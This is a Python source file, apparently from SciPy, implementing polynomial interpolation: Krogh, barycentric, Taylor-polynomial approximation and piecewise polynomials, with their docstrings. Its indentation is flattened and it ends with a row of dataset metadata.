def _set_yi(self, yi, xi=None, axis=None):
if axis is None:
axis = self._y_axis
if axis is None:
raise ValueError("no interpolation axis specified")
yi = np.asarray(yi)
shape = yi.shape
if shape == ():
shape = (1,)
if xi is not None and shape[axis] != len(xi):
raise ValueError("x and y arrays must be equal in length along "
"interpolation axis.")
self._y_axis = (axis % yi.ndim)
self._y_extra_shape = yi.shape[:self._y_axis]+yi.shape[self._y_axis+1:]
self.dtype = None
self._set_dtype(yi.dtype)
def _set_dtype(self, dtype, union=False):
if np.issubdtype(dtype, np.complexfloating) \
or np.issubdtype(self.dtype, np.complexfloating):
self.dtype = np.complex_
else:
if not union or self.dtype != np.complex_:
self.dtype = np.float_
class _Interpolator1DWithDerivatives(_Interpolator1D):
def derivatives(self, x, der=None):
"""
Evaluate many derivatives of the polynomial at the point x
Produce an array of all derivative values at the point x.
Parameters
----------
x : array-like
Point or points at which to evaluate the derivatives
der : None or integer
How many derivatives to extract; None for all potentially
nonzero derivatives (that is a number equal to the number
of points). This number includes the function value as 0th
derivative.
Returns
-------
d : ndarray
Array with derivatives; d[j] contains the j-th derivative.
Shape of d[j] is determined by replacing the interpolation
axis in the original array with the shape of x.
Examples
--------
>>> KroghInterpolator([0,0,0],[1,2,3]).derivatives(0)
array([1.0,2.0,3.0])
>>> KroghInterpolator([0,0,0],[1,2,3]).derivatives([0,0])
array([[1.0,1.0],
[2.0,2.0],
[3.0,3.0]])
"""
x, x_shape = self._prepare_x(x)
y = self._evaluate_derivatives(x, der)
y = y.reshape((y.shape[0],) + x_shape + self._y_extra_shape)
if self._y_axis != 0 and x_shape != ():
nx = len(x_shape)
ny = len(self._y_extra_shape)
s = ([0] + list(range(nx+1, nx + self._y_axis+1))
+ list(range(1,nx+1)) +
list(range(nx+1+self._y_axis, nx+ny+1)))
y = y.transpose(s)
return y
def derivative(self, x, der=1):
"""
Evaluate one derivative of the polynomial at the point x
Parameters
----------
x : array-like
Point or points at which to evaluate the derivatives
der : integer, optional
Which derivative to extract. This number includes the
function value as 0th derivative.
Returns
-------
d : ndarray
Derivative interpolated at the x-points. Shape of d is
determined by replacing the interpolation axis in the
original array with the shape of x.
Notes
-----
This is computed by evaluating all derivatives up to the desired
one (using self.derivatives()) and then discarding the rest.
"""
x, x_shape = self._prepare_x(x)
y = self._evaluate_derivatives(x, der+1)
return self._finish_y(y[der], x_shape)
class KroghInterpolator(_Interpolator1DWithDerivatives):
"""
Interpolating polynomial for a set of points.
The polynomial passes through all the pairs (xi,yi). One may
additionally specify a number of derivatives at each point xi;
this is done by repeating the value xi and specifying the
derivatives as successive yi values.
Allows evaluation of the polynomial and all its derivatives.
For reasons of numerical stability, this function does not compute
the coefficients of the polynomial, although they can be obtained
by evaluating all the derivatives.
Parameters
----------
xi : array-like, length N
Known x-coordinates. Must be sorted in increasing order.
yi : array-like
Known y-coordinates. When an xi occurs two or more times in
a row, the corresponding yi's represent derivative values.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
Notes
-----
Be aware that the algorithms implemented here are not necessarily
the most numerically stable known. Moreover, even in a world of
exact computation, unless the x coordinates are chosen very
carefully - Chebyshev zeros (e.g. cos(i*pi/n)) are a good choice -
polynomial interpolation itself is a very ill-conditioned process
due to the Runge phenomenon. In general, even with well-chosen
x values, degrees higher than about thirty cause problems with
numerical instability in this code.
Based on [1]_.
References
----------
.. [1] Krogh, "Efficient Algorithms for Polynomial Interpolation
and Numerical Differentiation", 1970.
Examples
--------
To produce a polynomial that is zero at 0 and 1 and has
derivative 2 at 0, call
>>> KroghInterpolator([0,0,1],[0,2,0])
This constructs the quadratic 2*X**2-2*X. The derivative condition
is indicated by the repeated zero in the xi array; the corresponding
yi values are 0, the function value, and 2, the derivative value.
For another example, given xi, yi, and a derivative ypi for each
point, appropriate arrays can be constructed as:
>>> xi_k, yi_k = np.repeat(xi, 2), np.ravel(np.dstack((yi,ypi)))
>>> KroghInterpolator(xi_k, yi_k)
To produce a vector-valued polynomial, supply a higher-dimensional
array for yi:
>>> KroghInterpolator([0,1],[[2,3],[4,5]])
This constructs a linear polynomial giving (2,3) at 0 and (4,5) at 1.
"""
def __init__(self, xi, yi, axis=0):
_Interpolator1DWithDerivatives.__init__(self, xi, yi, axis)
self.xi = np.asarray(xi)
self.yi = self._reshape_yi(yi)
self.n, self.r = self.yi.shape
c = np.zeros((self.n+1, self.r), dtype=self.dtype)
c[0] = self.yi[0]
Vk = np.zeros((self.n, self.r), dtype=self.dtype)
for k in xrange(1,self.n):
s = 0
while s <= k and xi[k-s] == xi[k]:
s += 1
s -= 1
Vk[0] = self.yi[k]/float(factorial(s))
for i in xrange(k-s):
if xi[i] == xi[k]:
raise ValueError("Elements if `xi` can't be equal.")
if s == 0:
Vk[i+1] = (c[i]-Vk[i])/(xi[i]-xi[k])
else:
Vk[i+1] = (Vk[i+1]-Vk[i])/(xi[i]-xi[k])
c[k] = Vk[k-s]
self.c = c
def _evaluate(self, x):
pi = 1
p = np.zeros((len(x), self.r), dtype=self.dtype)
p += self.c[0,np.newaxis,:]
for k in range(1, self.n):
w = x - self.xi[k-1]
pi = w*pi
p += pi[:,np.newaxis] * self.c[k]
return p
def _evaluate_derivatives(self, x, der=None):
n = self.n
r = self.r
if der is None:
der = self.n
pi = np.zeros((n, len(x)))
w = np.zeros((n, len(x)))
pi[0] = 1
p = np.zeros((len(x), self.r))
p += self.c[0,np.newaxis,:]
for k in xrange(1,n):
w[k-1] = x - self.xi[k-1]
pi[k] = w[k-1]*pi[k-1]
p += pi[k,:,np.newaxis]*self.c[k]
cn = np.zeros((max(der,n+1), len(x), r), dtype=self.dtype)
cn[:n+1,:,:] += self.c[:n+1,np.newaxis,:]
cn[0] = p
for k in xrange(1,n):
for i in xrange(1,n-k+1):
pi[i] = w[k+i-1]*pi[i-1]+pi[i]
cn[k] = cn[k]+pi[i,:,np.newaxis]*cn[k+i]
cn[k] *= factorial(k)
cn[n,:,:] = 0
return cn[:der]
def krogh_interpolate(xi,yi,x,der=0,axis=0):
"""
Convenience function for polynomial interpolation.
See `KroghInterpolator` for more details.
Parameters
----------
xi : array_like
Known x-coordinates.
yi : array_like
Known y-coordinates, of shape ``(xi.size, R)``. Interpreted as
vectors of length R, or scalars if R=1.
x : array_like
Point or points at which to evaluate the derivatives.
der : int or list
How many derivatives to extract; None for all potentially
nonzero derivatives (that is a number equal to the number
of points), or a list of derivatives to extract. This number
includes the function value as 0th derivative.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
Returns
-------
d : ndarray
If the interpolator's values are R-dimensional then the
returned array will be the number of derivatives by N by R.
If `x` is a scalar, the middle dimension will be dropped; if
the `yi` are scalars then the last dimension will be dropped.
See Also
--------
KroghInterpolator
Notes
-----
Construction of the interpolating polynomial is a relatively expensive
process. If you want to evaluate it repeatedly consider using the class
KroghInterpolator (which is what this function uses).
"""
P = KroghInterpolator(xi, yi, axis=axis)
if der == 0:
return P(x)
elif _isscalar(der):
return P.derivative(x,der=der)
else:
return P.derivatives(x,der=np.amax(der)+1)[der]
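# Illustrative usage (not part of the original file): interpolate three points
# lying on y = x**2 and evaluate the value and first derivative at x = 0.5.
#   >>> krogh_interpolate([0, 1, 2], [0, 1, 4], 0.5)              # -> 0.25
#   >>> krogh_interpolate([0, 1, 2], [0, 1, 4], 0.5, der=[0, 1])  # value and slope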
def approximate_taylor_polynomial(f,x,degree,scale,order=None):
"""
Estimate the Taylor polynomial of f at x by polynomial fitting.
Parameters
----------
f : callable
The function whose Taylor polynomial is sought. Should accept
a vector of `x` values.
x : scalar
The point at which the polynomial is to be evaluated.
degree : int
The degree of the Taylor polynomial
scale : scalar
The width of the interval to use to evaluate the Taylor polynomial.
Function values spread over a range this wide are used to fit the
polynomial. Must be chosen carefully.
order : int or None, optional
The order of the polynomial to be used in the fitting; `f` will be
evaluated ``order+1`` times. If None, use `degree`.
Returns
-------
p : poly1d instance
The Taylor polynomial (translated to the origin, so that
for example p(0)=f(x)).
Notes
-----
The appropriate choice of "scale" is a trade-off; too large and the
function differs from its Taylor polynomial too much to get a good
answer, too small and round-off errors overwhelm the higher-order terms.
The algorithm used becomes numerically unstable around order 30 even
under ideal circumstances.
Choosing order somewhat larger than degree may improve the higher-order
terms.
"""
if order is None:
order = degree
n = order+1
# Choose n points that cluster near the endpoints of the interval in
# a way that avoids the Runge phenomenon. Ensure, by including the
# endpoint or not as appropriate, that one point always falls at x
# exactly.
xs = scale*np.cos(np.linspace(0,np.pi,n,endpoint=n % 1)) + x
P = KroghInterpolator(xs, f(xs))
d = P.derivatives(x,der=degree+1)
return np.poly1d((d/factorial(np.arange(degree+1)))[::-1])
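# Illustrative usage (assumed, not from the original source): a degree-3 Taylor
# polynomial of sin around 0; scale=1.0 is an arbitrary but reasonable window.
#   >>> p = approximate_taylor_polynomial(np.sin, 0, degree=3, scale=1.0)
#   >>> p(0.1)   # close to np.sin(0.1)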
class BarycentricInterpolator(_Interpolator1D):
"""The interpolating polynomial for a set of points
Constructs a polynomial that passes through a given set of points.
Allows evaluation of the polynomial, efficient changing of the y
values to be interpolated, and updating by adding more x values.
For reasons of numerical stability, this function does not compute
the coefficients of the polynomial.
The values yi need to be provided before the function is
evaluated, but none of the preprocessing depends on them, so rapid
updates are possible.
Parameters
----------
xi : array-like
1-d array of x coordinates of the points the polynomial
should pass through
yi : array-like
The y coordinates of the points the polynomial should pass through.
If None, the y values will be supplied later via the `set_y` method.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
Notes
-----
This class uses a "barycentric interpolation" method that treats
the problem as a special case of rational function interpolation.
This algorithm is quite stable, numerically, but even in a world of
exact computation, unless the x coordinates are chosen very
carefully - Chebyshev zeros (e.g. cos(i*pi/n)) are a good choice -
polynomial interpolation itself is a very ill-conditioned process
due to the Runge phenomenon.
Based on Berrut and Trefethen 2004, "Barycentric Lagrange Interpolation".
"""
def __init__(self, xi, yi=None, axis=0):
_Interpolator1D.__init__(self, xi, yi, axis)
self.xi = np.asarray(xi)
self.set_yi(yi)
self.n = len(self.xi)
self.wi = np.zeros(self.n)
self.wi[0] = 1
for j in xrange(1,self.n):
self.wi[:j] *= (self.xi[j]-self.xi[:j])
self.wi[j] = np.multiply.reduce(self.xi[:j]-self.xi[j])
self.wi **= -1
def set_yi(self, yi, axis=None):
"""
Update the y values to be interpolated
The barycentric interpolation algorithm requires the calculation
of weights, but these depend only on the xi. The yi can be changed
at any time.
Parameters
----------
yi : array_like
The y coordinates of the points the polynomial should pass through.
If None, the y values will be supplied later.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
"""
if yi is None:
self.yi = None
return
self._set_yi(yi, xi=self.xi, axis=axis)
self.yi = self._reshape_yi(yi)
self.n, self.r = self.yi.shape
def add_xi(self, xi, yi=None):
"""
Add more x values to the set to be interpolated
The barycentric interpolation algorithm allows easy updating by
adding more points for the polynomial to pass through.
Parameters
----------
xi : array_like
The x coordinates of the points that the polynomial should pass
through.
yi : array_like, optional
The y coordinates of the points the polynomial should pass through.
Should have shape ``(xi.size, R)``; if R > 1 then the polynomial is
vector-valued.
If `yi` is not given, the y values will be supplied later. `yi` should
be given if and only if the interpolator has y values specified.
"""
if yi is not None:
if self.yi is None:
raise ValueError("No previous yi value to update!")
yi = self._reshape_yi(yi, check=True)
self.yi = np.vstack((self.yi,yi))
else:
if self.yi is not None:
raise ValueError("No update to yi provided!")
old_n = self.n
self.xi = np.concatenate((self.xi,xi))
self.n = len(self.xi)
self.wi **= -1
old_wi = self.wi
self.wi = np.zeros(self.n)
self.wi[:old_n] = old_wi
for j in xrange(old_n,self.n):
self.wi[:j] *= (self.xi[j]-self.xi[:j])
self.wi[j] = np.multiply.reduce(self.xi[:j]-self.xi[j])
self.wi **= -1
def __call__(self, x):
"""Evaluate the interpolating polynomial at the points x
Parameters
----------
x : array-like
Points to evaluate the interpolant at.
Returns
-------
y : array-like
Interpolated values. Shape is determined by replacing
the interpolation axis in the original array with the shape of x.
Notes
-----
Currently the code computes an outer product between x and the
weights, that is, it constructs an intermediate array of size
N by len(x), where N is the degree of the polynomial.
"""
return _Interpolator1D.__call__(self, x)
def _evaluate(self, x):
if x.size == 0:
p = np.zeros((0, self.r), dtype=self.dtype)
else:
c = x[...,np.newaxis]-self.xi
z = c == 0
c[z] = 1
c = self.wi/c
p = np.dot(c,self.yi)/np.sum(c,axis=-1)[...,np.newaxis]
# Now fix where x==some xi
r = np.nonzero(z)
if len(r) == 1: # evaluation at a scalar
if len(r[0]) > 0: # equals one of the points
p = self.yi[r[0][0]]
else:
p[r[:-1]] = self.yi[r[-1]]
return p
def barycentric_interpolate(xi, yi, x, axis=0):
"""
Convenience function for polynomial interpolation.
Constructs a polynomial that passes through a given set of points,
then evaluates the polynomial. For reasons of numerical stability,
this function does not compute the coefficients of the polynomial.
This function uses a "barycentric interpolation" method that treats
the problem as a special case of rational function interpolation.
This algorithm is quite stable, numerically, but even in a world of
exact computation, unless the `x` coordinates are chosen very
carefully - Chebyshev zeros (e.g. cos(i*pi/n)) are a good choice -
polynomial interpolation itself is a very ill-conditioned process
due to the Runge phenomenon.
Parameters
----------
xi : array_like
1-d array of x coordinates of the points the polynomial should
pass through
yi : array_like
The y coordinates of the points the polynomial should pass through.
x : scalar or array_like
Points to evaluate the interpolator at.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
Returns
-------
y : scalar or array_like
Interpolated values. Shape is determined by replacing
the interpolation axis in the original array with the shape of x.
See Also
--------
BarycentricInterpolator
Notes
-----
Construction of the interpolation weights is a relatively slow process.
If you want to call this many times with the same xi (but possibly
varying yi or x) you should use the class `BarycentricInterpolator`.
This is what this function uses internally.
"""
return BarycentricInterpolator(xi, yi, axis=axis)(x)
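# Illustrative usage (not part of the original file):
#   >>> xs = np.linspace(0, 2*np.pi, 15)
#   >>> barycentric_interpolate(xs, np.sin(xs), 1.0)   # approximately sin(1.0)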
class PiecewisePolynomial(_Interpolator1DWithDerivatives):
"""Piecewise polynomial curve specified by points and derivatives
This class represents a curve that is a piecewise polynomial. It
passes through a list of points and has specified derivatives at
each point. The degree of the polynomial may vary from segment to
segment, as may the number of derivatives available. The degree
should not exceed about thirty.
Appending points to the end of the curve is efficient.
Parameters
----------
xi : array-like
a sorted 1-d array of x-coordinates
yi : array-like or list of array-likes
yi[i][j] is the j-th derivative known at xi[i] (for axis=0)
orders : list of integers, or integer
a list of polynomial orders, or a single universal order
direction : {None, 1, -1}
indicates whether the xi are increasing or decreasing
+1 indicates increasing
-1 indicates decreasing
None indicates that it should be deduced from the first two xi
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
Notes
-----
If orders is None, or orders[i] is None, then the degree of the
polynomial segment is exactly the degree required to match all i
available derivatives at both endpoints. If orders[i] is not None,
then some derivatives will be ignored. The code will try to use an
equal number of derivatives from each end; if the total number of
derivatives needed is odd, it will prefer the rightmost endpoint. If
not enough derivatives are available, an exception is raised.
"""
def __init__(self, xi, yi, orders=None, direction=None, axis=0):
_Interpolator1DWithDerivatives.__init__(self, axis=axis)
warnings.warn('PiecewisePolynomial is deprecated in scipy 0.14. '
'Use BPoly.from_derivatives instead.',
category=DeprecationWarning)
if axis != 0:
try:
yi = np.asarray(yi)
except ValueError:
raise ValueError("If yi is a list, then axis must be 0")
preslice = ((slice(None,None,None),) * (axis % yi.ndim))
slice0 = preslice + (0,)
slice1 = preslice + (slice(1, None, None),)
else:
slice0 = 0
slice1 = slice(1, None, None)
yi0 = np.asarray(yi[slice0])
self._set_yi(yi0)
self.xi = [xi[0]]
self.yi = [self._reshape_yi(yi0)]
self.n = 1
self.r = np.prod(self._y_extra_shape, dtype=np.int64)
self.direction = direction
self.orders = []
self.polynomials = []
self.extend(xi[1:],yi[slice1],orders)
def _make_polynomial(self,x1,y1,x2,y2,order,direction):
"""Construct the interpolating polynomial object
Deduces the number of derivatives to match at each end
from order and the number of derivatives available. If
possible it uses the same number of derivatives from
each end; if the number is odd it tries to take the
extra one from y2. In any case if not enough derivatives
are available at one end or another it draws enough to
make up the total from the other end.
"""
n = order+1
n1 = min(n//2,len(y1))
n2 = min(n-n1,len(y2))
n1 = min(n-n2,len(y1))
if n1+n2 != n:
raise ValueError("Point %g has %d derivatives, point %g has %d derivatives, but order %d requested" % (x1, len(y1), x2, len(y2), order))
if not (n1 <= len(y1) and n2 <= len(y2)):
raise ValueError("`order` input incompatible with length y1 or y2.")
xi = np.zeros(n)
yi = np.zeros((n, self.r), dtype=self.dtype)
xi[:n1] = x1
yi[:n1] = y1[:n1].reshape((n1, self.r))
xi[n1:] = x2
yi[n1:] = y2[:n2].reshape((n2, self.r))
return KroghInterpolator(xi,yi,axis=0)
def append(self, xi, yi, order=None):
"""
Append a single point with derivatives to the PiecewisePolynomial
Parameters
----------
xi : float
Input
yi : array_like
`yi` is the list of derivatives known at `xi`
order : integer or None
a polynomial order, or instructions to use the highest
possible order
"""
yi = self._reshape_yi(yi, check=True)
self._set_dtype(yi.dtype, union=True)
if self.direction is None:
self.direction = np.sign(xi-self.xi[-1])
elif (xi-self.xi[-1])*self.direction < 0:
raise ValueError("x coordinates must be in the %d direction: %s" % (self.direction, self.xi))
self.xi.append(xi)
self.yi.append(yi)
if order is None:
n1 = len(self.yi[-2])
n2 = len(self.yi[-1])
n = n1+n2
order = n-1
self.orders.append(order)
self.polynomials.append(self._make_polynomial(
self.xi[-2], self.yi[-2],
self.xi[-1], self.yi[-1],
order, self.direction))
self.n += 1
def extend(self, xi, yi, orders=None):
"""
Extend the PiecewisePolynomial by a list of points
Parameters
----------
xi : array_like
A sorted list of x-coordinates.
yi : list of lists of length N1
``yi[i]`` (if ``axis == 0``) is the list of derivatives known
at ``xi[i]``.
orders : int or list of ints
A list of polynomial orders, or a single universal order.
direction : {None, 1, -1}
Indicates whether the `xi` are increasing or decreasing.
+1 indicates increasing
-1 indicates decreasing
None indicates that it should be deduced from the first two `xi`.
"""
if self._y_axis == 0:
# allow yi to be a ragged list
for i in xrange(len(xi)):
if orders is None or _isscalar(orders):
self.append(xi[i],yi[i],orders)
else:
self.append(xi[i],yi[i],orders[i])
else:
preslice = (slice(None,None,None),) * self._y_axis
for i in xrange(len(xi)):
if orders is None or _isscalar(orders):
self.append(xi[i],yi[preslice + (i,)],orders)
else:
self.append(xi[i],yi[preslice + (i,)],orders[i])
def _evaluate(self, x):
if _isscalar(x):
pos = np.clip(np.searchsorted(self.xi, x) - 1, 0, self.n-2)
y = self.polynomials[pos](x)
else:
m = len(x)
pos = np.clip(np.searchsorted(self.xi, x) - 1, 0, self.n-2)
y = np.zeros((m, self.r), dtype=self.dtype)
if y.size > 0:
for i in xrange(self.n-1):
c = pos == i
y[c] = self.polynomials[i](x[c])
return y
def _evaluate_derivatives(self, x, der=None):
if der is None and self.polynomials:
der = self.polynomials[0].n
if _isscalar(x):
pos = np.clip(np.searchsorted(self.xi, x) - 1, 0, self.n-2)
y = self.polynomials[pos].derivatives(x,der=der)
else:
m = len(x)
pos = np.clip(np.searchsorted(self.xi, x) - 1, 0, self.n-2)
y = np.zeros((der,m,self.r), dtype=self.dtype)
if y.size > 0:
for i in xrange(self.n-1):
c = pos == i
y[:,c] = self.polynomials[i].derivatives(x[c],der=der)
return y
def piecewise_polynomial_interpolate(xi,yi,x,orders=None,der=0,axis=0):
"""
Convenience function for piecewise polynomial interpolation.
Parameters
----------
xi : array_like
A sorted list of x-coordinates.
yi : list of lists
``yi[i]`` is the list of derivatives known at ``xi[i]``.
x : scalar or array_like
        Coordinates at which to evaluate the polynomial.
orders : int or list of ints, optional
A list of polynomial orders, or a single universal order.
der : int or list
How many derivatives to extract; None for all potentially
nonzero derivatives (that is a number equal to the number
of points), or a list of derivatives to extract. This number
includes the function value as 0th derivative.
axis : int, optional
Axis in the `yi` array corresponding to the x-coordinate values.
Returns
-------
y : ndarray
Interpolated values or derivatives. If multiple derivatives
were requested, these are given along the first axis.
See Also
--------
PiecewisePolynomial
Notes
-----
If `orders` is None, or ``orders[i]`` is None, then the degree of the
polynomial segment is exactly the degree required to match all i
available derivatives at both endpoints. If ``orders[i]`` is not None,
then some derivatives will be ignored. The code will try to use an
equal number of derivatives from each end; if the total number of
derivatives needed is odd, it will prefer the rightmost endpoint. If
not enough derivatives are available, an exception is raised.
Construction of these piecewise polynomials can be an expensive process;
if you repeatedly evaluate the same polynomial, consider using the class
PiecewisePolynomial (which is what this function does).
"""
P = PiecewisePolynomial(xi, yi, orders, axis=axis)
if der == 0:
return P(x)
elif _isscalar(der):
return P.derivative(x,der=der)
else:
return P.derivatives(x,der=np.amax(der)+1)[der]
|
bsd-3-clause
| -1,840,114,695,129,729,800
| 33.621651
| 148
| 0.588354
| false
| 3.916343
| false
| false
| false
|